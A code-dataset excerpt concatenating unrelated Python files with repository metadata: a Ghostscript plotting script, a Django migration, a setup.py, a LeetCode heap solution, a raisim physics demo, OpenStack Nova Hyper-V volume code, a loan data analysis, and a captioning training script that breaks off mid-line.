-sDEVICE=jpeg'+size+'-sOutputFile='+self.foutPath+self.foutName+'.jpg -dNOPAUSE -r100x100 '+self.fname+' -c quit' else: size = ' -g1200x1100 ' cmdStr = gsPath + ' -sDEVICE=jpeg'+size+'-sOutputFile='+self.foutPath+self.foutName+'%d.jpg -dNOPAUSE -r100x100 '+self.fname+' -c quit' print >>flog, 'cmdStr: ', cmdStr output = commands.getoutput(cmdStr) print >>flog, 'output from gs command: ', output return self.foutPath+self.foutName+'.jpg' #--- Main # def main(): tMin = 0 tMax = 100000 stateList = [0,1,2,2,3,3,3,3,4] fname = 'sched.txt' if len(sys.argv) == 2: fname = sys.argv[1] elif len(sys.argv) == 3: tMin = int(sys.argv[1]) tMax = int(sys.argv[2]) elif len(sys.argv) == 4: tMin = int(sys.argv[1]) tMax = int(sys.argv[2]) fname = sys.argv[3] elif len(sys.argv) != 1: print 'USAGE: psPlot.py [tMin tMax] [fname]' sys.exit(1) print 'tMin,tMax: ', tMin, tMax, 'fname: ', fname p = PsPlot('./p', 'Header', 'SubHeader', 1) fromStateList = [] toStateList = [] time1List = [] time2List = [] indx = 0 oldTime = 0 fin = open(fname, 'r') for inputLine in fin: inputLine = inputLine.replace(' ','') inputLine = inputLine.replace("'", '') i1 = inputLine.find('(') i2 = inputLine.find(')') inputList = inputLine[i1+1:i2-1].split(',') s1 = stateList[int(inputList[0])] s2 = stateList[int(inputList[1])] t = int(inputList[2]) if indx != 0 and t >= tMin and t <= tMax: fromStateList.append(s1) toStateList.append(s2) time1List.append(oldTime) time2List.append(t) oldTime = t indx += 1 p.SetPlot(tMin, tMax, 0, 0, 2, 0, 'Time', 'Socket/State', 'Chavey\'s Plot') state = 0 while state <= 4: t1List = [] t2List = [] sList = [] indx = 0 for s in toStateList: if s == state: t1List.append(time1List[indx]) t2List.append(time2List[indx]) sList.append(0.10 + s*0.20) indx += 1 p.PlotData(1,t1List, t2List, sList, 'Test', '0.1 in 0 '+p.SetColor(p.colors[state])+' plotWbarsC', sys.stdout) state += 1 image = p.GetImage(sys.stdout) print 'Image file: ', image p.End() if __name__ == "__main__": main()
[]
hamole/physio2go
physio2go/exercises/migrations/0003_auto_20161128_1753.py
ebd14c9406e2b6818dc649e4863a734bf812e9b0
# -*- coding: utf-8 -*- # Generated by Django 1.10.3 on 2016-11-28 06:53 from __future__ import unicode_literals from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('exercises', '0002_auto_20161128_1718'), ] operations = [ migrations.RenameModel( old_name='Exercises', new_name='Exercise', ), ]
[((15, 8, 18, 9), 'django.db.migrations.RenameModel', 'migrations.RenameModel', (), '', False, 'from django.db import migrations\n')]
pasinskim/mender-python-client
setup.py
d6f3dc86ec46b0b249a112c5037bea579266e649
# Copyright 2021 Northern.tech AS # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import setuptools import re VERSIONFILE = "src/mender/_version.py" version_string_line = open(VERSIONFILE, "rt").read() VSRE = r"^__version__ = ['\"]([^'\"]*)['\"]" match = re.search(VSRE, version_string_line, re.M) if match: version_string = match.group(1) else: raise RuntimeError("Unable to find version string in %s." % (VERSIONFILE,)) with open("README.md", "r", encoding="utf-8") as fh: long_description = fh.read() setuptools.setup( name="mender-python-client-mendersoftware", version=version_string, license="Apache 2.0", author="Mendersoftware", author_email="[email protected]", description="A Python implementation of the Mender client interface", long_description=long_description, long_description_content_type="text/markdown", url="https://github.com/mendersoftware/mender-python-client", classifiers=[ "Programming Language :: Python :: 3", "License :: OSI Approved :: Apache Software License", "Operating System :: OS Independent", ], keywords=["mender", "OTA", "updater"], packages=setuptools.find_packages(where="src"), install_requires=["cryptography", "requests", "msgpack", "websockets"], entry_points={"console_scripts": ["mender-python-client=mender.mender:main"]}, package_dir={"": "src"}, python_requires=">=3.6", zip_safe=False, include_package_data=True, )
[((20, 8, 20, 50), 're.search', 're.search', ({(20, 18, 20, 22): 'VSRE', (20, 24, 20, 43): 'version_string_line', (20, 45, 20, 49): 're.M'}, {}), '(VSRE, version_string_line, re.M)', False, 'import re\n'), ((45, 13, 45, 50), 'setuptools.find_packages', 'setuptools.find_packages', (), '', False, 'import setuptools\n')]
Linchin/python_leetcode_git
Q295-v2.py
3d08ab04bbdbd2ce268f33c501fbb149662872c7
""" 295 find median from data stream hard """ from heapq import * class MedianFinder: # max heap and min heap def __init__(self): """ initialize your data structure here. """ self.hi = [] self.lo = [] def addNum(self, num: int) -> None: heappush(self.lo, -heappushpop(self.hi, num)) while len(self.lo) > len(self.hi): heappush(self.hi, -heappop(self.lo)) def findMedian(self) -> float: if len(self.hi) > len(self.lo): return self.hi[0] if len(self.hi) == len(self.lo): return (self.hi[0] - self.lo[0]) / 2.0 sol = MedianFinder() sol.addNum(1) print(sol.findMedian()) sol.addNum(2) print(sol.findMedian())
[]
mstoelzle/raisimLib
raisimPy/examples/newtonsCradle.py
81f33a1b82f296e9622f950bc292f61bee2d2c2f
import os import numpy as np import raisimpy as raisim import math import time raisim.World.setLicenseFile(os.path.dirname(os.path.abspath(__file__)) + "/../../rsc/activation.raisim") world = raisim.World() ground = world.addGround() world.setTimeStep(0.001) world.setMaterialPairProp("steel", "steel", 0.1, 1.0, 0.0) pin1 = world.addSphere(0.1, 0.8) pin1.setAppearance("1,0,0,0.3") pin1.setPosition(0.0, 0.0, 3.0) pin1.setBodyType(raisim.BodyType.STATIC) pin2 = world.addSphere(0.1, 0.8) pin2.setAppearance("0,1,0,0.3") pin2.setPosition(0.3, 0.0, 3.0) pin2.setBodyType(raisim.BodyType.STATIC) pin3 = world.addSphere(0.1, 0.8) pin3.setAppearance("0,0,1,0.3") pin3.setPosition(0.6, 0.0, 3.0) pin3.setBodyType(raisim.BodyType.STATIC) pin4 = world.addSphere(0.1, 0.8) pin4.setAppearance("1,0,0,0.3") pin4.setPosition(0.9, 0.0, 3.0) pin4.setBodyType(raisim.BodyType.STATIC) pin5 = world.addSphere(0.1, 0.8) pin5.setPosition(0.9, 0.0, 6.0) pin5.setBodyType(raisim.BodyType.STATIC) pin6 = world.addSphere(0.1, 0.8) pin6.setPosition(-3., 0.0, 7.0) pin6.setBodyType(raisim.BodyType.STATIC) pin7 = world.addSphere(0.1, 0.8) pin7.setPosition(-4., 0.0, 7.0) pin7.setBodyType(raisim.BodyType.STATIC) anymalB_urdf_file = os.path.dirname(os.path.abspath(__file__)) + "/../../rsc/anymal/urdf/anymal.urdf" anymalC_urdf_file = os.path.dirname(os.path.abspath(__file__)) + "/../../rsc/anymal_c/urdf/anymal.urdf" anymalC = world.addArticulatedSystem(anymalC_urdf_file) anymalB = world.addArticulatedSystem(anymalB_urdf_file) jointNominalConfig = np.array([-3, 0, 4.54, 1.0, 0.0, 0.0, 0.0, 0.03, 0.4, -0.8, -0.03, 0.4, -0.8, 0.03, -0.4, 0.8, -0.03, -0.4, 0.8]) jointVelocityTarget = np.zeros([anymalC.getDOF()]) jointPgain = np.ones(anymalC.getDOF()) * 100.0 jointDgain = np.ones(anymalC.getDOF()) * 1.0 anymalC.setGeneralizedCoordinate(jointNominalConfig) anymalC.setPdGains(jointPgain, jointDgain) anymalC.setPdTarget(jointNominalConfig, jointVelocityTarget) anymalC.setName("anymalC") jointNominalConfig[0] = -4 anymalB.setGeneralizedCoordinate(jointNominalConfig) anymalB.setPdGains(jointPgain, jointDgain) anymalB.setPdTarget(jointNominalConfig, jointVelocityTarget) anymalB.setName("anymalB") ball1 = world.addSphere(0.1498, 0.8, "steel") ball1.setPosition(0, 0.0, 1.0) ball2 = world.addSphere(0.1499, 0.8, "steel") ball2.setPosition(0.3, 0.0, 1.0) ball3 = world.addSphere(0.1499, 0.8, "steel") ball3.setPosition(0.6, 0.0, 1.0) ball4 = world.addSphere(0.1499, 0.8, "steel") ball4.setPosition(2.9, 0.0, 3.0) box = world.addBox(.1, .1, .1, 1) box.setPosition(0.9, 0.0, 4.2) world.addStiffWire(pin1, 0, np.zeros(3), ball1, 0, np.zeros(3), 2.0) world.addStiffWire(pin2, 0, np.zeros(3), ball2, 0, np.zeros(3), 2.0) world.addStiffWire(pin3, 0, np.zeros(3), ball3, 0, np.zeros(3), 2.0) world.addStiffWire(pin4, 0, np.zeros(3), ball4, 0, np.zeros(3), 2.0) wire5 = world.addCompliantWire(pin5, 0, np.zeros(3), box, 0, np.zeros(3), 2.0, 200) wire5.setStretchType(raisim.StretchType.BOTH) wire6 = world.addCompliantWire(pin6, 0, np.zeros(3), anymalC, 0, np.zeros(3), 2.0, 1000) wire6.setStretchType(raisim.StretchType.BOTH) wire7 = world.addCustomWire(pin7, 0, np.zeros(3), anymalB, 0, np.zeros(3), 2.0) wire7.setTension(310) server = raisim.RaisimServer(world) server.launchServer(8080) for i in range(500000): time.sleep(0.001) server.integrateWorldThreadSafe() if i == 5000: world.removeObject(wire7) server.killServer()
[((8, 8, 8, 22), 'raisimpy.World', 'raisim.World', ({}, {}), '()', True, 'import raisimpy as raisim\n'), ((52, 21, 52, 134), 'numpy.array', 'np.array', ({(52, 30, 52, 133): '[-3, 0, 4.54, 1.0, 0.0, 0.0, 0.0, 0.03, 0.4, -0.8, -0.03, 0.4, -0.8, 0.03, \n -0.4, 0.8, -0.03, -0.4, 0.8]'}, {}), '([-3, 0, 4.54, 1.0, 0.0, 0.0, 0.0, 0.03, 0.4, -0.8, -0.03, 0.4, -\n 0.8, 0.03, -0.4, 0.8, -0.03, -0.4, 0.8])', True, 'import numpy as np\n'), ((97, 9, 97, 35), 'raisimpy.RaisimServer', 'raisim.RaisimServer', ({(97, 29, 97, 34): 'world'}, {}), '(world)', True, 'import raisimpy as raisim\n'), ((83, 28, 83, 39), 'numpy.zeros', 'np.zeros', ({(83, 37, 83, 38): '(3)'}, {}), '(3)', True, 'import numpy as np\n'), ((83, 51, 83, 62), 'numpy.zeros', 'np.zeros', ({(83, 60, 83, 61): '(3)'}, {}), '(3)', True, 'import numpy as np\n'), ((84, 28, 84, 39), 'numpy.zeros', 'np.zeros', ({(84, 37, 84, 38): '(3)'}, {}), '(3)', True, 'import numpy as np\n'), ((84, 51, 84, 62), 'numpy.zeros', 'np.zeros', ({(84, 60, 84, 61): '(3)'}, {}), '(3)', True, 'import numpy as np\n'), ((85, 28, 85, 39), 'numpy.zeros', 'np.zeros', ({(85, 37, 85, 38): '(3)'}, {}), '(3)', True, 'import numpy as np\n'), ((85, 51, 85, 62), 'numpy.zeros', 'np.zeros', ({(85, 60, 85, 61): '(3)'}, {}), '(3)', True, 'import numpy as np\n'), ((86, 28, 86, 39), 'numpy.zeros', 'np.zeros', ({(86, 37, 86, 38): '(3)'}, {}), '(3)', True, 'import numpy as np\n'), ((86, 51, 86, 62), 'numpy.zeros', 'np.zeros', ({(86, 60, 86, 61): '(3)'}, {}), '(3)', True, 'import numpy as np\n'), ((88, 40, 88, 51), 'numpy.zeros', 'np.zeros', ({(88, 49, 88, 50): '3'}, {}), '(3)', True, 'import numpy as np\n'), ((88, 61, 88, 72), 'numpy.zeros', 'np.zeros', ({(88, 70, 88, 71): '3'}, {}), '(3)', True, 'import numpy as np\n'), ((91, 40, 91, 51), 'numpy.zeros', 'np.zeros', ({(91, 49, 91, 50): '3'}, {}), '(3)', True, 'import numpy as np\n'), ((91, 65, 91, 76), 'numpy.zeros', 'np.zeros', ({(91, 74, 91, 75): '3'}, {}), '(3)', True, 'import numpy as np\n'), ((94, 37, 94, 48), 'numpy.zeros', 'np.zeros', ({(94, 46, 94, 47): '3'}, {}), '(3)', True, 'import numpy as np\n'), ((94, 62, 94, 73), 'numpy.zeros', 'np.zeros', ({(94, 71, 94, 72): '3'}, {}), '(3)', True, 'import numpy as np\n'), ((101, 4, 101, 21), 'time.sleep', 'time.sleep', ({(101, 15, 101, 20): '(0.001)'}, {}), '(0.001)', False, 'import time\n'), ((46, 36, 46, 61), 'os.path.abspath', 'os.path.abspath', ({(46, 52, 46, 60): '__file__'}, {}), '(__file__)', False, 'import os\n'), ((47, 36, 47, 61), 'os.path.abspath', 'os.path.abspath', ({(47, 52, 47, 60): '__file__'}, {}), '(__file__)', False, 'import os\n'), ((7, 44, 7, 69), 'os.path.abspath', 'os.path.abspath', ({(7, 60, 7, 68): '__file__'}, {}), '(__file__)', False, 'import os\n')]
viveknandavanam/nova
nova/virt/hyperv/volumeops.py
556377b6915936467436c9d5bb33bc0e22244e1e
# Copyright 2012 Pedro Navarro Perez # Copyright 2013 Cloudbase Solutions Srl # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. """ Management class for Storage-related functions (attach, detach, etc). """ import time from os_brick.initiator import connector from os_win import utilsfactory from oslo_log import log as logging from oslo_utils import strutils import nova.conf from nova import exception from nova.i18n import _, _LE, _LI, _LW from nova import utils from nova.virt import driver from nova.virt.hyperv import constants LOG = logging.getLogger(__name__) CONF = nova.conf.CONF class VolumeOps(object): """Management class for Volume-related tasks """ def __init__(self): self._vmutils = utilsfactory.get_vmutils() self._default_root_device = 'vda' self.volume_drivers = { constants.STORAGE_PROTOCOL_SMBFS: SMBFSVolumeDriver(), constants.STORAGE_PROTOCOL_ISCSI: ISCSIVolumeDriver(), constants.STORAGE_PROTOCOL_FC: FCVolumeDriver()} def _get_volume_driver(self, connection_info): driver_type = connection_info.get('driver_volume_type') if driver_type not in self.volume_drivers: raise exception.VolumeDriverNotFound(driver_type=driver_type) return self.volume_drivers[driver_type] def attach_volumes(self, volumes, instance_name): for vol in volumes: self.attach_volume(vol['connection_info'], instance_name) def disconnect_volumes(self, block_device_info): mapping = driver.block_device_info_get_mapping(block_device_info) for vol in mapping: self.disconnect_volume(vol['connection_info']) def attach_volume(self, connection_info, instance_name, disk_bus=constants.CTRL_TYPE_SCSI): tries_left = CONF.hyperv.volume_attach_retry_count + 1 while tries_left: try: self._attach_volume(connection_info, instance_name, disk_bus) break except Exception as ex: tries_left -= 1 if not tries_left: LOG.exception( _LE("Failed to attach volume %(connection_info)s " "to instance %(instance_name)s. "), {'connection_info': strutils.mask_dict_password( connection_info), 'instance_name': instance_name}) self.disconnect_volume(connection_info) raise exception.VolumeAttachFailed( volume_id=connection_info['serial'], reason=ex) else: LOG.warning( _LW("Failed to attach volume %(connection_info)s " "to instance %(instance_name)s. " "Tries left: %(tries_left)s."), {'connection_info': strutils.mask_dict_password( connection_info), 'instance_name': instance_name, 'tries_left': tries_left}) time.sleep(CONF.hyperv.volume_attach_retry_interval) def _attach_volume(self, connection_info, instance_name, disk_bus=constants.CTRL_TYPE_SCSI): LOG.debug( "Attaching volume: %(connection_info)s to %(instance_name)s", {'connection_info': strutils.mask_dict_password(connection_info), 'instance_name': instance_name}) volume_driver = self._get_volume_driver(connection_info) volume_driver.attach_volume(connection_info, instance_name, disk_bus) qos_specs = connection_info['data'].get('qos_specs') or {} if qos_specs: volume_driver.set_disk_qos_specs(connection_info, qos_specs) def disconnect_volume(self, connection_info): volume_driver = self._get_volume_driver(connection_info) volume_driver.disconnect_volume(connection_info) def detach_volume(self, connection_info, instance_name): LOG.debug("Detaching volume: %(connection_info)s " "from %(instance_name)s", {'connection_info': strutils.mask_dict_password( connection_info), 'instance_name': instance_name}) volume_driver = self._get_volume_driver(connection_info) volume_driver.detach_volume(connection_info, instance_name) volume_driver.disconnect_volume(connection_info) def fix_instance_volume_disk_paths(self, instance_name, block_device_info): # Mapping containing the current disk paths for each volume. actual_disk_mapping = self.get_disk_path_mapping(block_device_info) if not actual_disk_mapping: return # Mapping containing virtual disk resource path and the physical # disk path for each volume serial number. The physical path # associated with this resource may not be the right one, # as physical disk paths can get swapped after host reboots. vm_disk_mapping = self._vmutils.get_vm_physical_disk_mapping( instance_name) for serial, vm_disk in vm_disk_mapping.items(): actual_disk_path = actual_disk_mapping[serial] if vm_disk['mounted_disk_path'] != actual_disk_path: self._vmutils.set_disk_host_res(vm_disk['resource_path'], actual_disk_path) def get_volume_connector(self): # NOTE(lpetrut): the Windows os-brick connectors # do not use a root helper. conn = connector.get_connector_properties( root_helper=None, my_ip=CONF.my_block_storage_ip, multipath=CONF.hyperv.use_multipath_io, enforce_multipath=True, host=CONF.host) return conn def connect_volumes(self, block_device_info): mapping = driver.block_device_info_get_mapping(block_device_info) for vol in mapping: connection_info = vol['connection_info'] volume_driver = self._get_volume_driver(connection_info) volume_driver.connect_volume(connection_info) def get_disk_path_mapping(self, block_device_info): block_mapping = driver.block_device_info_get_mapping(block_device_info) disk_path_mapping = {} for vol in block_mapping: connection_info = vol['connection_info'] disk_serial = connection_info['serial'] disk_path = self.get_disk_resource_path(connection_info) disk_path_mapping[disk_serial] = disk_path return disk_path_mapping def get_disk_resource_path(self, connection_info): volume_driver = self._get_volume_driver(connection_info) return volume_driver.get_disk_resource_path(connection_info) @staticmethod def bytes_per_sec_to_iops(no_bytes): # Hyper-v uses normalized IOPS (8 KB increments) # as IOPS allocation units. return ( (no_bytes + constants.IOPS_BASE_SIZE - 1) // constants.IOPS_BASE_SIZE) @staticmethod def validate_qos_specs(qos_specs, supported_qos_specs): unsupported_specs = set(qos_specs.keys()).difference( supported_qos_specs) if unsupported_specs: msg = (_LW('Got unsupported QoS specs: ' '%(unsupported_specs)s. ' 'Supported qos specs: %(supported_qos_specs)s') % {'unsupported_specs': unsupported_specs, 'supported_qos_specs': supported_qos_specs}) LOG.warning(msg) class BaseVolumeDriver(object): _is_block_dev = True _protocol = None _extra_connector_args = {} def __init__(self): self._conn = None self._diskutils = utilsfactory.get_diskutils() self._vmutils = utilsfactory.get_vmutils() @property def _connector(self): if not self._conn: scan_attempts = CONF.hyperv.mounted_disk_query_retry_count scan_interval = CONF.hyperv.mounted_disk_query_retry_interval self._conn = connector.InitiatorConnector.factory( protocol=self._protocol, root_helper=None, use_multipath=CONF.hyperv.use_multipath_io, device_scan_attempts=scan_attempts, device_scan_interval=scan_interval, **self._extra_connector_args) return self._conn def connect_volume(self, connection_info): return self._connector.connect_volume(connection_info['data']) def disconnect_volume(self, connection_info): self._connector.disconnect_volume(connection_info['data']) def get_disk_resource_path(self, connection_info): disk_paths = self._connector.get_volume_paths(connection_info['data']) if not disk_paths: vol_id = connection_info['serial'] err_msg = _("Could not find disk path. Volume id: %s") raise exception.DiskNotFound(err_msg % vol_id) return self._get_disk_res_path(disk_paths[0]) def _get_disk_res_path(self, disk_path): if self._is_block_dev: # We need the Msvm_DiskDrive resource path as this # will be used when the disk is attached to an instance. disk_number = self._diskutils.get_device_number_from_device_name( disk_path) disk_res_path = self._vmutils.get_mounted_disk_by_drive_number( disk_number) else: disk_res_path = disk_path return disk_res_path def attach_volume(self, connection_info, instance_name, disk_bus=constants.CTRL_TYPE_SCSI): dev_info = self.connect_volume(connection_info) serial = connection_info['serial'] disk_path = self._get_disk_res_path(dev_info['path']) ctrller_path, slot = self._get_disk_ctrl_and_slot(instance_name, disk_bus) if self._is_block_dev: # We need to tag physical disk resources with the volume # serial number, in order to be able to retrieve them # during live migration. self._vmutils.attach_volume_to_controller(instance_name, ctrller_path, slot, disk_path, serial=serial) else: self._vmutils.attach_drive(instance_name, disk_path, ctrller_path, slot) def detach_volume(self, connection_info, instance_name): disk_path = self.get_disk_resource_path(connection_info) LOG.debug("Detaching disk %(disk_path)s " "from instance: %(instance_name)s", dict(disk_path=disk_path, instance_name=instance_name)) self._vmutils.detach_vm_disk(instance_name, disk_path, is_physical=self._is_block_dev) def _get_disk_ctrl_and_slot(self, instance_name, disk_bus): if disk_bus == constants.CTRL_TYPE_IDE: # Find the IDE controller for the vm. ctrller_path = self._vmutils.get_vm_ide_controller( instance_name, 0) # Attaching to the first slot slot = 0 else: # Find the SCSI controller for the vm ctrller_path = self._vmutils.get_vm_scsi_controller( instance_name) slot = self._vmutils.get_free_controller_slot(ctrller_path) return ctrller_path, slot def set_disk_qos_specs(self, connection_info, disk_qos_specs): LOG.info(_LI("The %(protocol)s Hyper-V volume driver " "does not support QoS. Ignoring QoS specs."), dict(protocol=self._protocol)) class ISCSIVolumeDriver(BaseVolumeDriver): _is_block_dev = True _protocol = constants.STORAGE_PROTOCOL_ISCSI def __init__(self, *args, **kwargs): self._extra_connector_args = dict( initiator_list=CONF.hyperv.iscsi_initiator_list) super(ISCSIVolumeDriver, self).__init__(*args, **kwargs) class SMBFSVolumeDriver(BaseVolumeDriver): _is_block_dev = False _protocol = constants.STORAGE_PROTOCOL_SMBFS _extra_connector_args = dict(local_path_for_loopback=True) def export_path_synchronized(f): def wrapper(inst, connection_info, *args, **kwargs): export_path = inst._get_export_path(connection_info) @utils.synchronized(export_path) def inner(): return f(inst, connection_info, *args, **kwargs) return inner() return wrapper def _get_export_path(self, connection_info): return connection_info['data']['export'].replace('/', '\\') @export_path_synchronized def attach_volume(self, *args, **kwargs): super(SMBFSVolumeDriver, self).attach_volume(*args, **kwargs) @export_path_synchronized def disconnect_volume(self, *args, **kwargs): # We synchronize those operations based on the share path in order to # avoid the situation when a SMB share is unmounted while a volume # exported by it is about to be attached to an instance. super(SMBFSVolumeDriver, self).disconnect_volume(*args, **kwargs) def set_disk_qos_specs(self, connection_info, qos_specs): supported_qos_specs = ['total_iops_sec', 'total_bytes_sec'] VolumeOps.validate_qos_specs(qos_specs, supported_qos_specs) total_bytes_sec = int(qos_specs.get('total_bytes_sec') or 0) total_iops_sec = int(qos_specs.get('total_iops_sec') or VolumeOps.bytes_per_sec_to_iops( total_bytes_sec)) if total_iops_sec: disk_path = self.get_disk_resource_path(connection_info) self._vmutils.set_disk_qos_specs(disk_path, total_iops_sec) class FCVolumeDriver(BaseVolumeDriver): _is_block_dev = True _protocol = constants.STORAGE_PROTOCOL_FC
[((34, 6, 34, 33), 'oslo_log.log.getLogger', 'logging.getLogger', ({(34, 24, 34, 32): '__name__'}, {}), '(__name__)', True, 'from oslo_log import log as logging\n'), ((44, 24, 44, 50), 'os_win.utilsfactory.get_vmutils', 'utilsfactory.get_vmutils', ({}, {}), '()', False, 'from os_win import utilsfactory\n'), ((62, 18, 62, 73), 'nova.virt.driver.block_device_info_get_mapping', 'driver.block_device_info_get_mapping', ({(62, 55, 62, 72): 'block_device_info'}, {}), '(block_device_info)', False, 'from nova.virt import driver\n'), ((154, 15, 159, 27), 'os_brick.initiator.connector.get_connector_properties', 'connector.get_connector_properties', (), '', False, 'from os_brick.initiator import connector\n'), ((163, 18, 163, 73), 'nova.virt.driver.block_device_info_get_mapping', 'driver.block_device_info_get_mapping', ({(163, 55, 163, 72): 'block_device_info'}, {}), '(block_device_info)', False, 'from nova.virt import driver\n'), ((170, 24, 170, 79), 'nova.virt.driver.block_device_info_get_mapping', 'driver.block_device_info_get_mapping', ({(170, 61, 170, 78): 'block_device_info'}, {}), '(block_device_info)', False, 'from nova.virt import driver\n'), ((212, 26, 212, 54), 'os_win.utilsfactory.get_diskutils', 'utilsfactory.get_diskutils', ({}, {}), '()', False, 'from os_win import utilsfactory\n'), ((213, 24, 213, 50), 'os_win.utilsfactory.get_vmutils', 'utilsfactory.get_vmutils', ({}, {}), '()', False, 'from os_win import utilsfactory\n'), ((54, 18, 54, 73), 'nova.exception.VolumeDriverNotFound', 'exception.VolumeDriverNotFound', (), '', False, 'from nova import exception\n'), ((221, 25, 227, 45), 'os_brick.initiator.connector.InitiatorConnector.factory', 'connector.InitiatorConnector.factory', (), '', False, 'from os_brick.initiator import connector\n'), ((240, 22, 240, 66), 'nova.i18n._', '_', ({(240, 24, 240, 65): '"""Could not find disk path. Volume id: %s"""'}, {}), "('Could not find disk path. Volume id: %s')", False, 'from nova.i18n import _, _LE, _LI, _LW\n'), ((241, 18, 241, 58), 'nova.exception.DiskNotFound', 'exception.DiskNotFound', ({(241, 41, 241, 57): '(err_msg % vol_id)'}, {}), '(err_msg % vol_id)', False, 'from nova import exception\n'), ((305, 17, 306, 65), 'nova.i18n._LI', '_LI', ({(305, 21, 306, 64): '"""The %(protocol)s Hyper-V volume driver does not support QoS. Ignoring QoS specs."""'}, {}), "('The %(protocol)s Hyper-V volume driver does not support QoS. Ignoring QoS specs.'\n )", False, 'from nova.i18n import _, _LE, _LI, _LW\n'), ((330, 13, 330, 44), 'nova.utils.synchronized', 'utils.synchronized', ({(330, 32, 330, 43): 'export_path'}, {}), '(export_path)', False, 'from nova import utils\n'), ((106, 32, 106, 76), 'oslo_utils.strutils.mask_dict_password', 'strutils.mask_dict_password', ({(106, 60, 106, 75): 'connection_info'}, {}), '(connection_info)', False, 'from oslo_utils import strutils\n'), ((125, 38, 126, 38), 'oslo_utils.strutils.mask_dict_password', 'strutils.mask_dict_password', ({(126, 22, 126, 37): 'connection_info'}, {}), '(connection_info)', False, 'from oslo_utils import strutils\n'), ((197, 19, 199, 70), 'nova.i18n._LW', '_LW', ({(197, 23, 199, 69): '"""Got unsupported QoS specs: %(unsupported_specs)s. Supported qos specs: %(supported_qos_specs)s"""'}, {}), "('Got unsupported QoS specs: %(unsupported_specs)s. Supported qos specs: %(supported_qos_specs)s'\n )", False, 'from nova.i18n import _, _LE, _LI, _LW\n'), ((87, 26, 89, 34), 'nova.exception.VolumeAttachFailed', 'exception.VolumeAttachFailed', (), '', False, 'from nova import exception\n'), ((100, 20, 100, 72), 'time.sleep', 'time.sleep', ({(100, 31, 100, 71): 'CONF.hyperv.volume_attach_retry_interval'}, {}), '(CONF.hyperv.volume_attach_retry_interval)', False, 'import time\n'), ((80, 24, 81, 62), 'nova.i18n._LE', '_LE', ({(80, 28, 81, 61): '"""Failed to attach volume %(connection_info)s to instance %(instance_name)s. """'}, {}), "('Failed to attach volume %(connection_info)s to instance %(instance_name)s. '\n )", False, 'from nova.i18n import _, _LE, _LI, _LW\n'), ((92, 24, 94, 58), 'nova.i18n._LW', '_LW', ({(92, 28, 94, 57): '"""Failed to attach volume %(connection_info)s to instance %(instance_name)s. Tries left: %(tries_left)s."""'}, {}), "('Failed to attach volume %(connection_info)s to instance %(instance_name)s. Tries left: %(tries_left)s.'\n )", False, 'from nova.i18n import _, _LE, _LI, _LW\n'), ((82, 44, 83, 45), 'oslo_utils.strutils.mask_dict_password', 'strutils.mask_dict_password', ({(83, 29, 83, 44): 'connection_info'}, {}), '(connection_info)', False, 'from oslo_utils import strutils\n'), ((95, 44, 96, 45), 'oslo_utils.strutils.mask_dict_password', 'strutils.mask_dict_password', ({(96, 29, 96, 44): 'connection_info'}, {}), '(connection_info)', False, 'from oslo_utils import strutils\n')]
lakshit-sharma/greyatom-python-for-data-science
-Loan-Approval-Analysis/code.py
55a6e5a4c54a4f7135cc09fb287d2f2fa1d36413
# -------------- # Importing header files import numpy as np import pandas as pd from scipy.stats import mode # code starts here bank = pd.read_csv(path) categorical_var = bank.select_dtypes(include = 'object') print(categorical_var) numerical_var = bank.select_dtypes(include = 'number') print(numerical_var) banks = bank.drop(columns=['Loan_ID']) bank_mode = banks.mode() banks = banks.fillna(bank_mode.iloc[0]) print(banks.isnull().sum()) avg_loan_amount = pd.pivot_table(banks, index=['Gender', 'Married', 'Self_Employed'], values='LoanAmount', aggfunc = 'mean') print(avg_loan_amount) loan_approved_se = banks[ (banks['Self_Employed'] == "Yes") & (banks['Loan_Status'] == "Y") ] loan_approved_nse = banks[ (banks['Self_Employed'] == "No") & (banks['Loan_Status'] == "Y") ] percentage_se = (len(loan_approved_se) / 614) * 100 percentage_nse = (len(loan_approved_nse) / 614) * 100 # loan amount term loan_term = banks['Loan_Amount_Term'].apply(lambda x: int(x)/12 ) big_loan_term=len(loan_term[loan_term>=25]) print(big_loan_term) columns_to_show = ['ApplicantIncome', 'Credit_History'] loan_groupby=banks.groupby(['Loan_Status'])[columns_to_show] # Check the mean value mean_values=loan_groupby.agg([np.mean]) print(mean_values) # code ends here
[((11, 7, 11, 24), 'pandas.read_csv', 'pd.read_csv', ({(11, 19, 11, 23): 'path'}, {}), '(path)', True, 'import pandas as pd\n'), ((23, 18, 23, 124), 'pandas.pivot_table', 'pd.pivot_table', (), '', True, 'import pandas as pd\n')]
jacobswan1/Video2Commonsense
others/train_RNN.py
4dcef76360a29702fd90b7030a39a123da6db19e
''' Training Scropt for V2C captioning task. ''' __author__ = 'Jacob Zhiyuan Fang' import os import numpy as np from opts import * from utils.utils import * import torch.optim as optim from model.Model import Model from torch.utils.data import DataLoader from utils.dataloader import VideoDataset from model.transformer.Optim import ScheduledOptim def train(loader, model, optimizer, opt, cap_vocab, cms_vocab): model.train() for epoch in range(opt['epochs']): iteration = 0 for data in loader: torch.cuda.synchronize() if opt['cms'] == 'int': cms_labels = data['int_labels'] elif opt['cms'] == 'eff': cms_labels = data['eff_labels'] else: cms_labels = data['att_labels'] if opt['cuda']: fc_feats = data['fc_feats'].cuda() cap_labels = data['cap_labels'].cuda() cms_labels = cms_labels.cuda() optimizer.zero_grad() # cap_probs, cms_probs = model(fc_feats, cap_labels, cap_pos, cms_labels, cms_pos) cap_probs, _, cms_probs, _ = model(fc_feats, cap_labels, cms_labels) # note: currently we just used most naive cross-entropy as training objective, # advanced loss func. like SELF-CRIT, different loss weights or stronger video feature # may lead performance boost, however is not the goal of this work. cap_loss, cap_n_correct = cal_performance(cap_probs.view(-1, cap_probs.shape[-1]), cap_labels[:, 1:], smoothing=True) cms_loss, cms_n_correct = 